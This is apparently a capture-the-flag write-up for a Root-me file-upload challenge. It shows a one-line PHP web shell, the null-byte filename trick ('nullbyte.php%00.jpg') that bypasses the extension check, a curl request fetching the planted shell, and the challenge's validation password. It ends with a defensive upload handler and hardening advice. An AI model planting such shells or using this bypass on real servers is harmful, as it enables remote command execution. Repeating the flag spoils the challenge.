Root-me

File upload - null byte

This time we’ll upload a file and use a null byte to bypass the extension check.

We’ll use the same php code that we used before.

<?php if($_GET['cmd']) { system($_GET['cmd']); } ?>

This time we’ll name it nullbyte.php%00.jpg, and the web page will tell us the location of the file. The only thing left to do is to retrieve it, leaving the %00.jpg off the URL.

curl http://challenge01.root-me.org/web-serveur/ch22/galerie/upload/randomstring/nullbyte.php

Well done ! You can validate this challenge with the password : YPNchi2NmTwygr2dgCCF
This file is already deleted.
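
The trick works when the extension check and the code that stores the file disagree about where the name ends. The following is an added example of an upload handler that closes that gap. It is not the challenge's code, and the function name, the ALLOWED list and the sample files are assumptions made for illustration.

```php
<?php
// Added example, not the challenge's code. ALLOWED and the function name are hypothetical.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

function stored_name_for_upload(string $clientName, string $tmpPath): ?string
{
    // Refuse a NUL byte in the client-supplied name, raw or percent-encoded.
    // Decoding a few rounds also catches double encoding such as %2500.
    $name = $clientName;
    for ($i = 0; $i < 4; $i++) {
        if (strpos($name, "\0") !== false) {
            return null;
        }
        $name = rawurldecode($name);
    }

    // Decide the type from the file content, never from the name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !array_key_exists($mime, ALLOWED)) {
        return null;
    }

    // The stored name is generated server-side; nothing from the client name survives.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
}

// Constructed sample inputs: a small PHP file and a minimal GIF.
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, '<?php echo "constructed sample"; ?>');
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, "GIF89a\x01\x00\x01\x00\x00\x00\x00;");

var_dump(stored_name_for_upload('nullbyte.php%00.jpg', $php)); // the name used in this write-up
var_dump(stored_name_for_upload('photo.jpg', $php));           // image name, PHP content
var_dump(stored_name_for_upload('cat.gif', $gif));             // image name, GIF content

unlink($php);
unlink($gif);
```

Storing uploads in a directory where the web server does not execute PHP adds a second layer if a check like this is ever bypassed.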